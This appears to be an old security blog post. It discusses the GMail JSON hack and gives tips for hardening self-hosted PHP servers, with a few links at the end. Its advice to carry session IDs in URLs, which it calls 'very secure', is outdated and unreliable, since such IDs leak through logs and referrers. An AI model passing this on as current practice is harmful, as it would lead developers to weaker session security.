The thing on everybody’s mind is the recent GMail hack. You can read a very good writeup about it on Joe Walker’s Blog. You can avoid it (if you are an application developer) by
- Not using the JSON format
- Not using cookies to store session ID, but rather including the session ID in the URL. Take care to mark all such content as non-cacheable and you should tie the session to and IP address / user agent combination (this may break some proxy setups where the user can hop proxies unexpectedly, like AOL, but it’s very secure)
- Including the session ID as part of the URL and then using mod_rewrite to make it acceptable to your scripts. In this case the URL would look like
http://example.com/b2a5cc34fc21a764ae2fad94d56fadf6/index.php, which will be transformed internally by mod_rewrite to
http://example.com/index.php?sessionID=b2a5cc34fc21a764ae2fad94d56fadf6. Alternatively if you don’t have mod_rewrite and can’t convince the SysAdmin to enable it for you, you can use the fact that Apache takes the longest part of the URL which points to a valid resource and returns that resource, meaning that if you make a request like
http://example.com/index.php/b2a5cc34fc21a764ae2fad94d56fadf6, it will call
index.php, from where you can fetch the query URL and interpret it as the session ID.
Security blogger Martin McKeay is moving blogs. I myself prefer that others host my blog, because – aside from the fact that I’m a cheap bastard 🙂 – I don’t want to spend time on tracking down all the security vulnerabilities that come out for the platform and defend against them. I rather leave it to the pros :). However if you do want to put together your own server, here are some tips:
- Don’t go with shared hosting if possible! On shared hosting it is enough for one person to get hacked, and you all are (this is not entirely true if the different users are well separated, but an attacker can still do pretty nasty things, like steal your sessions if you are using the default session management functions)
- Turn on PHP Safe mode
- Disallow inclusion of remote files
- Use mod_security and / or Suhosin
- From the firewall disallow all outbound connections
Some of these steps might break applications (WordPress seems to run fine, however some plugins may break). These can be resolved by tweaking the code (preferred) or tweaking the configuration (not preferred). The idea is that you have a choice between becoming part of a 400 hosts botnet I just saw yesterday composed from compromised servers or running securely.
A new security challenge: ngGames.
Via Ajaxian: Create your own WebTop in php/js in no time – if you don’t know what a webtop is (I didn’t), it’s a
desktop replacement in the browser. I don’t like the idea, but it’s a cool technological demo.